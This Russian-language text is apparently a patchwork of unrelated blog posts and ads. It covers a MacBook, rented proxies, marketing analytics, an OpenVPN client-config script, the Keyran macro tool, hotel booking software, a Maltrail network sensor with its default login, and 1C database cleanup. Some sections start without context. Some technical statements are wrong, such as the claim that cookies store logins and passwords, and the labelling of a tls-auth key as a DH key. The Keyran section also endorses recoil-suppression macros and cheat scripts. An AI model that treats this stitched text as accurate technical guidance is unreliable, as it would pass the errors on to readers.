Если вы хотите приобрести мощный и функциональный ноутбук, обратите внимание на модель Apple MacBook Air M2. Поближе ознакомиться с устройством можно на сайте http://apple-rostov.com/katalog/macbook/apple-macbook-air-m2-2022/.

Возможности MacBook Air M2

MacBook Air M2 — высокотехнологичное устройство. С его помощью можно решать самые разные задачи. Например, это касается творческих идей. Ноутбук поможет:

• освоить цифровое рисование. С его помощью реально создать настоящие шедевры для последующего использования в играх, комиксах;
• записать и обработать музыку. MacBook Air M2 с легкостью справляется с тяжелыми приложениями, созданными для работы с композициями. Это позволит вам в полной мере реализовать свой потенциал;
• проводить качественную ретушь. На все команды устройство реагирует быстро, способно справляться даже с тяжелой графикой. Это особенно полезно будет для фотографов, видеографов, режиссеров.

MacBook Air M2 также можно использовать для выполнения рабочих обязанностей (составления таблиц, отчетов, презентаций), написания приложений, создания сайтов, учебы. Ноутбук отличается высоким уровнем производительности, поэтому справится с любыми математическими вычислениями.

Характеристики MacBook Air M2

Ценится устройство в первую очередь за свои безупречные технические характеристики:

• расширенный объем SSD-накопителя (возможны варианты от 256 Гб до 2 Тб);
• пропускная способность до 100 Гбит/сек;
• поддержка функции быстрой зарядки;
• до 15 часов в автономном режиме работы;
• 4 новых динамика, с поддержкой Spatial Audio и видео с Dolby Atmos;
• поддержка связи Wi-Fi 6.

MacBook Air M2 — стильный и функциональный ноутбук, который подарит вам максимальный комфорт от использования. Устройство способно справиться с большими нагрузками, моментально реагирует на все задачи. Модель подойдет для творческого хобби, работы, учебы или игр. Справится с любой графикой и приложениями. Посмотреть устройства, доступные для заказа, можно на сайте http://apple-rostov.com/katalog/macbook/apple-macbook-air-m2-2022/.

Хороший выбор — макбук на 1 Тб. Тогда у вас будет точно достаточно места на устройстве для хранения всей важной информации. Оформить заказ с доставкой можно онлайн.

Сложность работы в WordStat из другой страны

Важно понимать, что поисковые сервисы принимают во внимание страну, из которой осуществляется запрос. Например, выдача по ключу «ремонт стиральных машин» будет абсолютно разной в Украине, Беларуси, Казахстане, Российской Федерации и так далее. Если же у СЕО-шника стоит задача собрать ключи и продвинуть ресурс в Казахстане, находясь при этом в другой стране, важно использовать прокси сервер Казахстана.

Принцип очень простой. Прокси сервер подменяет IP адрес. В данном случае – на казахский. В итоге специалист получает нужные данные и имеет все возможности для эффективной работы над проектом. Такой же принцип и при работе с другими странами, с другими ресурсами. Главное – найти надежный прокси, который будет стабильно и быстро работать. В интернете есть много бесплатных прокси. Но все они имеют низкие показатели, так как давно заблокированы многими системами или же используются одновременно десятками и сотнями людей.

ShopProxy: надежность и удобство

Вы можете приобрести прокси сервер по ссылке shopproxy.net – это официальная страница магазина ShopProxy, который с 2015 года предоставляет качественный и удобный сервис по аренде IP адресов разных стран. Ключевыми преимуществами магазина являются такие моменты:

• Большой выбор прокси серверов разных стран;
• Только быстрые и стабильные соединения, которые позволят активно и комфортно работать;
• Автоматизированный личный кабинет, совершающий все задачи в любое время суток;
• Профессиональная круглосуточная поддержка, которая выслушает и поможет решить технические и финансовые вопросы, связанные с работой сервиса;
• Доступные тарифные планы, которые радуют низкими ценами и большим выбором.

Если вы СЕО-шник, работайте из любой точки мира эффективно и удобно. Покупайте недорогие прокси сервера для парсинга и сбора ключевых запросов. Используйте интернет без ограничений.

Дополнительная информация доступна на интернет-ресурсе https://www.shopproxy.net/

Кому нужна сквозная аналитика

СА стоит внедрять, если:

• Используется много каналов привлечения.
• В системе применяется CRM, которая собирает информацию для расчёта конверсий, загружает сведения, изучает отчёты по веб-аналитике.
• На бизнес выделен высокий маркетинговый бюджет. Продажи ведутся в больших оборотах.

Надо помнить, что сквозная аналитика не решит все проблемы.

Инструмент только помогает управлять рекламой, оптимизировать бюджет и подталкивает к правильным идеям.

Как действует сквозная аналитика

На страницах устанавливают модуль-счётчик. Цель – отслеживание действий пользователей: заполнение заявок, добавление товара в корзину, покупка. Счётчик сканирует cookies файлы, которые содержат данные о посещённых сайтах, логины, пароли и cid. Таким образом, собранная информация объединяется.

Люди не совершают покупки на первой же попавшейся площадке. Они заходят с разных источников, переключаются между сайтами. Номер ID – уникальный, он присваивается пользователю и не меняется. Поэтому сервис сквозной аналитики легко определяют то, что сайт посещает один и тот же человек. Сквозная аналитика рассчитывает влияние маркетинговых каналов на конверсии и продажи. Также это способствует лучшему пониманию пути клиента.

Какую пользу можно извлечь из сквозной аналитики

По сравнению с Яндекс.Метрикой и Google Analytics, сквозная аналитика учитывает всю статистику, в том числе офлайн-покупки, отказы и возвраты. Итоговые данные по выручке и марже будут гораздо правдивее. СА показывает весь путь пользователя, начиная с первого захода на площадку и заканчивая непосредственно покупкой товара.

Система сквозной аналитики находит информацию в различных источниках: рекламные кабинеты, CRM, сайт. При этом учитываются основные показатели эффективности, среди которых присутствуют:

• CTR – процентное соотношение числа кликов на объявление к количеству его показов, то есть можно посмотреть, сколько пользователей увидели публикацию и нажали на неё.
• CPC – плата за клики, характеристика помогает узнать среднюю стоимость одного клика. Сумма зависит от местоположения, времени, конкуренции.
• CPL – стоимость одного лида. Модель подсчитывает, во сколько обошёлся каждый потенциальный покупатель. Как найти: взять общую сумму расходов и разделить на количество лидов.
• ROI – финансовый коэффициент, который определяет доходность или убыточность бизнеса. При расчётах учитывают сумму вложений или инвестиций.

Сквозная аналитика позволяет определить, какую лучше использовать маркетинговую кампанию. Некоторые рекламные проекты становятся очень прибыльными, а другие наоборот, только тратят бюджет и совсем не приводят клиентов.

Понятие

SERP – это первое, что видит пользователь, после того, как вводит запрос (он же ключевое слово) и нажимает на Enter.

Элементы, выполняющие определенные функции в интерфейсе SERP, являются для всех поисковых систем неизменными в течение продолжительного периода времени.

Однако для пользователей ежедневно данная поисковая страница представляется по-новому, так как большую часть пространства занимают меняющиеся блоки рекламы контекстного типа и органическая выдача.

Кроме того есть элементы, появляющиеся для выполнения определенных опций, в зависимости от того, какой тип запроса вводится: определенные элементы управления, связанные запросы или шорткаты.

Основные элементы

• Выдача органического типа. Является основополагающим элементом SERP. Представляет собой набор нескольких ссылок на страницы в сети Интернет, проиндексированные поисковиком и выданные тому, кто ввел запрос, при этом с учетом последовательности ранжирования. К каждой ссылке прикреплен тег и сниппет (емкая короткая выдержка из выданной страницы, которая больше всего по смыслу соответствует запросу).
• Выдача коммерческого типа. Представляет собой блоки с рекламой контекстного типа, среди которой встречаются объявления в виде текста, текста совместно с графикой, и мультимедийная реклама. В основном выдача коммерческого типа появляется на экране выше выдачи органического типа, правее нее или прямо под ней. Количество объявлений варьируется в зависимости от востребованности запроса пользователя среди рекламодателей. По менее востребованным запросам выдача коммерческого типа может не появляться на экране.
• Шорткаты. Представляют собой элементы, появляющиеся в качестве ответа на определенную категорию запросов пользователей. Шорткаты являются, по сути, сгенерированным емким коротким ответом на пользовательский вопрос, выдаваемый в автоматическом режиме непосредственно поисковой системой. В шорткатах отсутствуют отсылки к любым сайтам. Например, поисковик выдает на запрос пользователя конкретный курс валют на заданную дату, точное время, может показать точное расстояние от одного населенного пункта до другого и прочая информация, которая не требует дополнительной расшифровки.
• Запросы связанного типа. Поисковик в некоторых ситуациях отображает возможный запрос пользователя, если он распознает ошибку в запросе, набранном человеком, данная ошибка исправляется поисковой системой в автоматическом режиме, сопровождая уведомлением для пользователя об исправлении ошибки.
• Элементы управления. К данным элементам причисляются ссылки, которые позволяют при нажатии на них перейти на другую страницу выдачи, а также прочие разделы поисковика и ссылки на другие объекты и др.

Физический сервер – оборудование, направленное на хранение информации или эффективное решение определенных задач без оператора. Сначала аппаратный комплекс программируется с учетом поставленной цели, далее он работает самостоятельно, выполняя установленные на нем команды. «Железо» подключается к портам, соединяющим его с Всемирной паутиной. Чем выше пропускная возможность порта, тем быстрее работает ИС.

В чем плюсы собственного физического сервера?

Физический сервер подбирают под индивидуальные требования, с учетом поставленных задач. Если этого не сделать, можно «пролететь». Первый вариант – существенная выгода не будет достигнута, второй – вы переплачиваете, покупая слишком мощное оборудование, в котором ваш бизнес не нуждается. В такой ситуации нельзя действовать опрометчиво, а следует консультироваться со специалистами.

Ниже приведены преимущества физической «машины».

1. Конфиденциальность данных и полная независимость, чего не может дать виртуальный хостинг. Получить доступ к «железу» или отключить его могут только администраторы компании-владельца.
2. Любая проблема решается на месте и оперативно. Исправить сбой можно ручным перезапуском или иным доступным действием.
3. Администратор может рассчитать необходимые объемы мощности, чтобы отключить или задействовать для другого проекта оставшиеся ресурсы.
4. Для работы одной компании создается индивидуальная архитектура, обеспечивающая эффективное взаимодействие компьютерной сети, производственного либо офисного оборудования.
5. В любой нестандартной ситуации сервер можно просто отключить от питания.
6. Локальную сеть всегда можно перепрограммировать для решения других задач.
7. Только физический сервер обеспечит полную безопасность собственных разработок, изобретений, защитив их от кражи и обнародования.

Чем отличается VPN и Proxy (прокси)?

Основное различие в том, что прокси работает преимущественно с http-протоколом. По сути как бы встраивается между вами и целевым сервисом немного модифицируя заголовки запросов. Есть развитие прокси в виде socks – более функциональный, работает с любыми портами. Но суть в общем-то та же.

Теперь VPN. ВПН – технология построения виртуальных частных сетей. То есть вы фактически выделяете новый сегмент поверх существующего. Здесь возможно прикрутить шифрование (AES – реальный стандарт, не поддающийся взлому), сжатие данных. И много чего ещё. Читайте статью про VPN.

Что лучше?

Как всегда, в таких случаях важно учитывать контекст. Для работы браузера или приложения, работающего через HTTP – прокси будет быстрее и легковеснее. Если нужно объединить два узла, находящиеся в разных частях Земли в одну сеть так, как если бы это были соседи по комнате – то VPN однозначно.

Если нужна приватность данных – VPN. Если нужно сделать какой-нибудь парсер, собирающий данные с других сайтов и “представляющийся” пачкой посетителей из других стран – лучше прокси. И так далее.

На сайтах с арендой прокси как правило пишут для каких целей предназначены те или иные варианты. Вот лишь некоторые из них:

• доступ в Инстаграм, Facebook, VK, Одноклассники, YouTube;
• прокси для Yandex, Google, KeyCollector (программа для парсинга ключевых запросов);
• прокси для онлайн-игр (даже перечислять не буду, я – динозавр, даже таких названий не знаю)
• для интернет-магазинов, букмейкерских контор, …

Прокси покупается (арендуется) в личное пользование, продавец гарантирует, что на период аренды им будете пользоваться только вы. К сожалению, нет гарантии того, что до вашей аренды его не использовали в какой-то противоправной деятельности, так как ни провайдер ни магазин прокси не ведут статистику и историю покупок.

на момент написания статьи на сайте можно было арендовать адреса из 53 стран (~800 подсетей).

Что это значит для владельцев бизнеса?

Компания с узкоспециализированными специалистами берёт на себя все задачи по обслуживанию серверов и рабочих станций, настройке серверов, телекоммуникационного оборудования и телефонии и решению всевозможных проблем.

Это и многое другое

• обслуживание компьютеров, оргтехники, сервреов, локальных сетей, объединение офисов через VPN;
• аудит, оптимизация и настройка IT-инфраструктуры;
• решение проблем удалённо и с выездом по Москве, Московской области и Нижнему Новгороду;
• внедрение и развитие антивирусных решений;
• администрирование физических и виртуальных серверов, телефонии, сетевого оборудования;
• мониторинг инфраструктуры;
• сопровождение 1С, внедрение корпоративной почты и разработка сайтов.

Успешные кейсы

Решение для внутренней коммуникации подразделений МЧС.

Колл-центр для аэропорта Шереметьево.

Внедрение системы резервного копирования

… другие проекты предоставлены на сайте, не буду перечислять их все.

Просто, чтобы было понятно, что масштабы проектов заслуживают внимания и задачи достаточно разнообразны.

Зачем отдавать на аутсорс?

Извечный вопрос. Всегда кажется, что можно сэкономить, если нанять студента на полставки, который будет “переустанавливать виндоус”.

Но всегда есть риски:

1. Студент банально может не справиться с объёмами и сложной задачей.
2. Найдёте студента со знанием Asterisk и VMWare vSphere?
3. А студент возьмёт на себя ответственность за интеграцию дорогого решения в критически важный бизнес-процесс?
4. А не махнёт ли рукой студент, вкалывающий за копейки, когда найдёт чуть более высокооплачиваемую работу?

Если брать эти и многие другие вопросы во внимание, то становится понятно, что не так уж и хорош “бесплатный/дешёвый сыр”.

В случае с моноблоками или  ноутбуками обычно дела обстоят иначе. Просто так не подлезть, требуется чуть более высокий уровень квалификации, да и ландшафт hardware для замены (апгрейда) заметно меньше.

Позволю себе немного прорекламировать сайт партнёров из Москвы, занимающихся как раз таки ремонтом моноблоков любой сложности.

Большинство проблем с моноблоками решается прямо на месте, без необходимости экстрадиции “больного” в сервисный центр. Что хорошо – работают легально, как с физическими лицами, так и с юридическими, с возможностью оплаты по безналичному расчёту. Все необходимые чеки на выполненные работы предоставляются, так же как и гарантия.

Почему лучше обращаться к специалистам

(а не чинить самостоятельно)

Два случая из реальной жизни, не совсем про моноблоки.

Одно время я любил сам во всём разбираться, ремонтировал свой (да и не только свой) ноутбук. Фотал, кстати, для своего сайта материал на нём. И вот, в очередной раз при разборке просто оторвал шлейф случайно. Можно было бы заказать новый, в моём городе – не продают. Но ждать с Китая очень долго. Это месяц. В итоге плюнул и решил, что 20+ лет ноуту уже пора на покой. А у ноута родственников просто сломалась кнопка. Как сломали – не знаю, давили сильно может быть. Соответственно опять пришлось бы заказывать детальку. В нормальном сервисном центре все такие мелкие “расходники”, будь то USB-разъемы или кнопки – уже скорее всего есть в наличии.

Случай второй – при ремонте смартфона. Детали уже не помню, но отдал товарищу, который “набил руку уже” на заменах дисплея. Каким-то образом он “зарукожопил” так, что пришлось заказывать ещё и материнскую плату к телефону. И даже после её замены телефон вообще не видел WiFi сеть (еле-еле, будто проблемы с антенной, хотя она была целая). Вот что значит “кустарщина”. Поэтому всё-таки лучше сэкономить своё время и нервы (и даже деньги, часто) и обратиться к тем, за чьими плечами не 1-3 успешных аппарата, а десятки-сотни.

Сегодня на рынке профессий свои услуги предлагает большое количество людей, работающих в сфере программирования. Но, чтобы найти работодателя, готового платить хорошие деньги за предоставленные услуги, приходится пройти строгий отбор и с самого начала показать уровень своего профессионализма. Для этих целей и составляется резюме. И если анкета составлена грамотно, то шансы получить желаемую должность значительно вырастают. Следует учитывать, что при составлении хорошего резюме в него необходимо вносить не только свои технические данные и уровень образования, но и обязательные личностные качества, соответствующие требованиям работодателя. Тут подробно рассказано https://top-programming.ru/blog/professionalnye-i-lichnye-kachestva-programmista, какими именно качествами должен обладать хороший программист.

Рассмотрим самые основные из них

Личностные качества, которым работодатели уделяют особое внимание

Помимо того, что хороший программист должен хорошо знать математику, английский, логику и все базовые навыки программирования, он непременно должен обладать целым списком необходимых личностных качеств:

• Аналитический склад мышления и умение решать новые задачи. Программирование – создание чего-то нового. Иногда перед специалистом стоит такая задача, на которую еще нет ответа. Необходимо не бояться ничего нового, уметь брать на себя ответственность и принимать нестандартные решения.
• Упорство, умение быстро концентрировать внимание на поставленной задаче, усидчивость.
  Специфика работы программиста предполагает постоянную концентрацию на мелких деталях, алгоритмах и цифрах. Необходимо все время проявлять пристальное внимание, чтобы не упустить даже мельчайших значений, которые играют важную роль в создаваемом проекте. А иногда, приходится проделывать одно и то же действие по нескольку десятку раз, чтобы добиться необходимого результата, что требует невероятной усидчивости, стрессоустойчивости и умения сохранять интерес к монотонной работе.
• Общительность, желание и умение работать в команде.
  Программист не работает в «стол». Все его идеи разрабатываются для того, чтобы быть реализованными. Поэтому хороший специалист должен уметь общаться с людьми, находить контакты взаимодействия, уметь подать и отстоять свои идеи, коммуницировать как с заказчиком, так и с командой, с которой ему придется работать.
• Энтузиазм, ответственность и готовность идти вперед.
  Хороший кодер должен понимать, что его профессия предполагает постоянный рост и развитие. Программирование, как и современные технологии – вечно двигающийся вперед процесс. Квалифицированный специалист должен не терять энтузиазма, всегда держать руку на пульсе и шагать в ногу с современной наукой. Нет программиста, который уже все знает и умеет, есть люди, которые готовы бесконечно развиваться в этой профессии.

Именно эти качества работодатель указывает в требованиях к специалисту непросто для галочки, а в подтверждение тому, что человек действительно является профессионалом своего дела и по-настоящему хороший программист.

Источник: top-programming.ru

VPN – “виртуальная частная сеть”, говоря простым языком, поверх (внутри) имеющейся глобальной сети Интернет строится ещё одна сеть, которая объединяет различные устройства, изолирует их от внешнего воздействия. Например можно соединить в одну сеть два своих офиса, расположенные в разных частях города или вообще в разных странах так, как если бы они были подключены прямым кабелем.

Проблема

Сейчас практически каждая “домохозяйка” использует VPN для доступа в “Инсту” даже не представляя, какие процессы при этом проходят “под капотом”. В AppStore и GooglePlay появились сотни приложений с “бесплатный ВПН”, напичканные рекламой, работающие через раз или вообще содержащие откровенно вредоносные закладки. Эти сервисы прикрывают один за другим, неизвестно, сколько просуществует тот или иной продукт.

Решение

Возникла естественная мысль – сделать свой VPN, тем более уже был опыт настройки OpenVPN. Осталось только привнести практический смысл в этот процесс.

План такой:

1. Арендуем сервер где-нибудь в Нидерландах.
2. Настраиваем OpenVPN-сервер и NAT.
3. Выпускаем ключи доступа для каждого устройства, которое нужно подключить.

Реализация

Аренда сервера

Для этого я пошёл к хостеру ВДСина, поскольку там, как мне кажется, самые лояльные тарифы и посуточная оплата, так, что можно “свернуть” проект или развернуть что-нибудь тестовое, поработать несколько дней и потерять не слишком много ресурсов.

У меня есть у меня партнёрская ссылка, по которой вы можете получить бонус 10% скидку на услуги.

Я выбираю “Стандартный сервер” на CentOS 7, с локацией в Амстердаме. Как видите, стоимость всего 6,6р в день (~200р в месяц), вполне себе доступная тема – один стаканчик кофе. При этом утилизация сервера – порядка 1-2%, так что можно ещё что-нибудь на нём развернуть.

После того, как сервер будет создан (около минуты), нужно подключиться к нему по VNC и настроить удобный SSH-доступ. Это мы уже тыщу раз делали, не буду на этом останавливаться.

Настройка OpenVPN и NAT

Работу по настройке OpenVPN я описывал ранее, единственное, что сейчас версии вышли поновее. Конфиг практически тот же.

Что ещё нужно?

В файл /etc/sysctl.conf дописать:

net.ipv4.ip_forward=1

Чтобы работала маршрутизация между интерфейсами.

И пропишем в автостарт скрипт с openvpn:

openvpn --config /etc/openvpn/server.conf --daemon
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -j MASQUERADE

При условии, что наша OpenVPN сеть имеет такую адресацию.

Ну вроде бы всё.

Выпускаем ключи доступа

Тут всё как в прошлой статье, единственное, что для мобильных клиентов нужно поставить приложение OpenVPN и подготовить .ovpn-конфигурацию в виде одного файла, куда вставить содержимое ключей между соответствующими тегами:

#!/bin/bash
cd /etc/openvpn/easy-rsa/
./easyrsa build-client-full $1
cp pki/issued/$1.crt /home/********/
cp pki/private/$1.key /home/********/
cd /home/********/
cat $1.crt | sed -n '/^-----BEGIN/,/-----END/p' > $1.crtcl
cat stage1 > $1.ovpn
cat $1.crtcl >> $1.ovpn
echo '</cert>' >> $1.ovpn
echo '' >> $1.ovpn
echo '<key>' >> $1.ovpn
cat $1.key >> $1.ovpn
echo '</key>' >> $1.ovpn
cat stage2 >> $1.ovpn
chown ******** /home/********/$1.ovpn

Вот такой скриптик накидал, он конечно не очень лаконичный, зато работает)  Формирует .ovpn следующего содержания:

remote <IP сервера> 1194
proto udp
resolv-retry infinite
cipher AES-256-CBC
persist-key
persist-tun
client
dev tun
<ca>
-----BEGIN CERTIFICATE-----
здесь сертификат удостоверяющего центра, общее для всех
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
здесь содержимое индивидуального сертификата пользователя (/etc/openvpn/easy-rsa/pki/issued/ из этого каталога, файл *.crt)
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN ENCRYPTED PRIVATE KEY-----
здесь содержимое приватного ключа пользователя (/etc/openvpn/easy-rsa/pki/private/ из этого каталога, файл *.key)
-----END ENCRYPTED PRIVATE KEY-----
</key>
<tls-auth>
-----BEGIN OpenVPN Static key V1-----
здесь содержимое ключа DH, общее для всех
-----END OpenVPN Static key V1-----
</tls-auth>
key-direction 1

Когда конфигурация будет сформирована, её можно смело скормить приложению:

Вся настройка заняла буквально 10 минут.

Всё, подключение происходит практически мгновенно, никакой рекламы и минимальные задержки) Всем добра.

Программа Keyran, скачать её можно с оф.сайта.

Что за программа?

Внешний вид программы представлен на скрине ниже:

Возможности:

1. Подавление отдачи в шутерах;
2. Автоматизация различных рутинных действий в играх;
3. Работа даже со свёрнутым окном;
4. Распознавание цвета пиксела;
5. Установка произвольных задержек.
6. Совместимость с макросами формата .AMC.

Библиотека макросов

Уже “из коробки” доступно несколько тысяч готовых “скриптов” для различных игр и приложений. Например, я когда-то резался в Terraria и сталкивался с утомительным копанием туннеля. Так что кто-то уже заморочился и записал макрос для автоматического рытья в нужную сторону) конечно нужно контролировать процесс, чтобы не провалиться в проломы или лаву, но скрипты можно дорабатывать и комбинировать между собой:

Редактор скриптов

На случай отсутствия готового макроса, всегда можно записать или сконструировать свой, кастомный:

В общем-то не составит большого труда составить какую-нибудь комбинацию ударов для эмулятора Sega и раритетной Mortal Kombat3 Ultimate:).

Возможности редактора включают в себя операции перехода, циклы, работу с раскладками клавиатуры, получение цвета пиксела. Доступно 4 переменных, значения которых можно учитывать во время работы.

Зачем нужно определение цвета пиксела?

Помню, был в игре “Сапёр” (встроенной в старые версии Windows) чит-код, позволяющий узнавать, есть ли под клеткой, на которую наведён указатель мыши мина или нет. Дело в том, что после определённого кода в левом верхнем углу экрана загоралась или гасла белая точка в зависимости от типа клетки (с миной или нет). Поэтому вполне можно реализовать такой чит-скрипт, который раз в N миллисекунд считывает цвет конкретной точки на экране и в зависимости от этого или кликает на клетку или ставит флажок (“мина”). Да мало ли ещё какие задачи бывают? Распознать движение на экране, появление посторонних окон и т.д.

Централизованное хранение настроек

Программа Keyran поддерживает хранение своих скриптов централизованно, для этого нужно завести аккаунт на их сервере и войти под своим “профилем”. Это обеспечит синхронизацию всех настроек и макросов.

Не буду перепечатывать всю информацию с сайта, лучше продемонстрирую функционал на небольшой практической работе. Если интересно – скачайте с оф.сайта и потестируйте.

Практический этап

Написал себе небольшой макрос, который печатает команды:

git add .
git commit -m "-"

Небольшая задержка в 24 мс. между нажатиями очень желательна, чтобы драйвер успевал корректно отработать и не загнал одномоментно большое количество событий.

Вешаю его на сочетание клавиш Ctrl+Q:

Затем нажимаю большую кнопку “Play” в главном окне и вуаля! Для ленивых разработчиков при работе с Git есть небольшой помощник.

По информации с сайта разработчиков, программа всё-таки больше ориентирована на геймеров. Решение гибких прикладных задач возможно, но в достаточно узких пределах. Чтож, на всякий продукт есть своя целевая аудитория.

Основные возможности

Шахматка

Традиционно в приложениях такого класса есть планировщик в виде развернутого календаря “шахматка”, позволяющий визуализировать степень занятости номеров.

Отчётность

Расширенная отчётность – консолидация данных в одном месте, с возможностью отфильтровать данные по периодам, сделать срез по номерам, источникам и многим другим параметрам.

Менеджер каналов

Позволяет настроить интеграцию с множеством сервисов онлайн-бронирования. И да, многие из них с учётом геополитической обстановки вам уже не пригодятся, но тем не менее, возможность приятная.

Интеграция с подобными сервисами позволяет избежать так называемого “овербукинга”, когда из-за проблем синхронизации один и тот же номер бронируется на одно время в различных источниках.

Модуль бронирования

Современный адаптивный под различные устройства модуль, позволяет осуществить бронирование и приём оплаты прям с вашего сайта или соц.сетей.

Гибкие настройки модуля, а также интеграция с эквайрингом позволяют развернуть работу практически “из коробки”.

Прямая ссылка

Интересная функция, позволяет отправить ссылку на предзаполненную форму вашему гостю через SMS или удобный мессенджер, гостю останется только проверить бронирование и оплатить его.

Стоимость продукта

Продукт коммерческий (как всегда, в системах такого уровня). Но в сегменте b2b это ожидаемо. Есть возможность получить поддержку по гос.программе, это даст дополнительную скидку в 50%.

Для расчёта цены на сайте есть онлайн-калькулятор, скидки есть также за подписку сразу на длительный период (уже от полугода).

Под работу сенсора я выделил небольшую виртуалку с двумя интерфейсами – один – для управления, в Management VLAN, вторую – для трафика, подал туда зеркало (span-порт коммутатора).

Установка Maltrail

Maltrail представляет собой несколько python-скриптов, так что оптимальнее будет слить их с github:

# git clone https://github.com/stamparm/maltrail

Затем переходим в рабочий каталог:

# cd ./maltrail

и немного правим конфиг:

# nano maltrail.conf

Указываю интерфейс для прослушки:

...
MONITOR_INTERFACE ens224
...

Запуск Maltrail

Сам продукт состоит как бы из двух частей:

1. Анализатор трафика:
   # python3 sensor.py
2. Веб-сервер для просмотра статистики:
   # python3 server.py

При запуске сенсор начинает загрузку своих сигнатур из различных источников и, в последствии, начинает слушать трафик на интерфейсе.

Кстати, если на не нужно “живое” прослушивание, то можно просто скормить сенсору .PCAP-файл используя ключ -r и указав путь к записанному трафику (например тем же tcpdump и т.д.). Эффект будет тот же.

Как выглядит:

При первом запуске предложит авторизоваться. Пароль (хеш) хранится в конфиге. По умолчанию входим как admin:changeme!

Все события классифицируются по потокам, важности, источникам и т.д. Рассмотрим, например, наиболее важные:

Как видим, судя по трафику, функционирует некий бот, который запрашивает характерные DNS-имена. К сожалению, на текущем этапе выявить источник у меня не получится – записал трафик после NAT, но по крайней мере можно уже поставить конкретную ловушку на DNS с записью внутреннего “серого” IP-адреса и найти инфицированный комп.

Кстати, маркеры событий тут бывают разных типов:

1. Эвристика (предположения) – активность, которая с большой долей вероятности является вредоносной.
2. Известные DNS-имена, IP-адреса, UA (UserAgent-ы) – это уже некое подобие антивирусных сигнатур.
3. Признаки масс-сканирования, подозрительный домен, выходная нода TOR-сети (тоже подозрительно), подозрительные скрипты и т.д.

Системные требования не очень высокие, поэтому организовать мониторинг трафика такими малыми затратами, я считаю, целесообразно.

И кстати, логи падают в текстовом виде в /var/log/maltrail/дата, так что без проблем можно будет сделать парсер или направить их в систему корреляции событий.

Не будем забывать и про необходимость хранения архивных копий базы данных. Если долго и активно пользоваться базой 1С, если количество пользователей уже не маленькое, то конечно, начинает возникать вопрос об объеме информационной базы. Где взять 50-100 ГБ свободного места для базы данных и еще раз в 10 больше этого для хранения ежедневных копий? А если база занимает уже 300-500 ГБ? А если она не одна, а их 10?

В этой статье мы расскажем, на какие хитрости можно пойти, чтобы сэкономить место на дисках и уменьшить размеры базы данных 1С.

Удаление помеченных объектов

Очень часто, в базе 1С существуют ненужные данные, которые помечены на удаление, но ещё не удалены. Для системы, они ничем не отличаются от обычных данных и занимают ровно столько же места. Но, если данные не нужны для учета, зачем их хранить? Хранить их в надежде, что они когда-то понадобятся весьма странная затея: как показывает практика, пользователи регулярно вносят данные повторно и не проверяют, нет ли таких данных среди помеченных на удаление. Так что мы крайне рекомендуем Вам не лениться и провести процедуру удаления помеченных объектов. А ещё лучше, если Вы настроите регулярное удаление объектов по расписанию, например, раз в неделю.
Возможно, эта процедура не пройдет гладко, придется разобраться с так называемой «ссылочной целостностью». Дело в том, что 1С не даст удалить объект, если на него ссылаются другие объекты. И может оказаться, что, например, договор закрыт, документы по нему не актуальны. Но договор удалять нельзя, потому что документы, которые на него ссылаются, не помечены на удаление. С такими проблемами придется разбираться вручную, но это стоит того. Это даст хорошие возможности по сохранению свободного места.
Как удалить данные мы уже писали здесь.

Удаление ненужных данных

Этот пункт вытекает из предыдущего: очень часто данные уже не нужны или даже никогда не были нужны, но они прекрасно существую в базе данных и занимают кучу свободного места на дисках. Это могут быть, например, данные классификаторов адресов ФИАС/КЛАДР. Представьте ситуацию, Ваша организация работает в одном регионе, у неё нет контрагентов из другого региона, но в базу загружен классификатор адресов всей России. Совершенно очевидно, что подход «на всякий случай пусть будет», это не то, что требуется в такой ситуации. Данные адресов всегда можно загрузить дополнительно, а займет это всего пару минут.
Аналогичная проблема может встречаться с избыточными данными по ключевым справочникам, например, по справочнику «номенклатура» или «контрагенты». Кто-то, когда-то, загрузил в справочник номенклатуры 100 000 позиций, а используется в реальности только 1 000. Или решил загрузить всех контрагентов региона, «на всякий случай».
Все такие ситуации придется отрабатывать, к сожалению, вручную. Нет универсального механизма, который бы сразу сказал нужны эти данные или нет.

Сжатие базы средствами 1С или SQL.

Современные СУБД, да и 1С (в файловом режиме работы) функционируют следующим образом: когда им требуется свободное места на диске, чтобы что-то записать, они просят не ровно столько, сколько нужно, а берут с запасом. Например, нужно 10 МБ, а берут сразу 100 МБ. Чтобы не просить потом ещё раз. А если данные удалить и уже не требуется столько свободного места, то они все равно не вернут его просто так. Оставят про запас. Вот такие они запасливые:)
В конфигураторе 1С есть специальная функция, которая как раз выполняет функцию по освобождению этого «незанятого» свободного места. Но работает она только для файлового режима 1С:

Вариант для SQL является слишком сложным для обычных пользователей, поэтому публиковать мы его не будем.

Обращаем Ваше внимание на то, что такую процедуру лучше проводить после серьёзных изменений в базе данных 1С, например, после удаления помеченных объектов. В противном случае, размер базы данных достаточно быстро вернется к первоначальным значениям.

Удаление журнала регистрации 1С

Журнал регистрации 1С – это специальный механизм для хранения действий пользователей. Вот удалили документ, кто это сделал и когда? На все это может ответить журнал регистрации.
И его можно настраивать. Выбирать события, какие будут регистрироваться, разделять, ну и сокращать. Порой это очень полезно – нет смысла хранить данные 5 летней давности, а вот данные месячной давности очень даже нужны.

И эта процедура сильно помочь, особенно если Вы работаете с файловой базой данных 1С (в версии SQL файлы журнала регистрации отдельно от базы данных).

Свертка базы данных

Эта процедура заключается в следующем: зачем хранить данные о хозяйственных операциях за прошлые периоды, если к ним никогда никто не обращается. Например, зачем нам смотреть что было 5 лет назад, если нужен по сути только этот год и предыдущий. Можно просто сделать копию базы, на случай необходимости, а в рабочей базе все удалить. И не просто все удалить, а подготовить срезы данных, чтобы с ними тоже можно было работать, но без глубокой детализации. Например, взять все движения денежных средств за месяц и просуммировать по каждому контрагенту. Это гораздо экономичнее, чем хранить данные по движению за каждый день. А ведь в день их может быть тоже несколько десятков.
Конечно, такая процедура требует серьёзной подготовки, выполняется она не быстро и требует высококлассных опытных специалистов.

Конечно, это далеко не все рекомендации, которые можно выполнить. Есть ещё несколько интересных секретов, но они не всегда помогают, все зависит от конкретной ситуации. Но начать можно как раз с того, что мы описали в этой статье!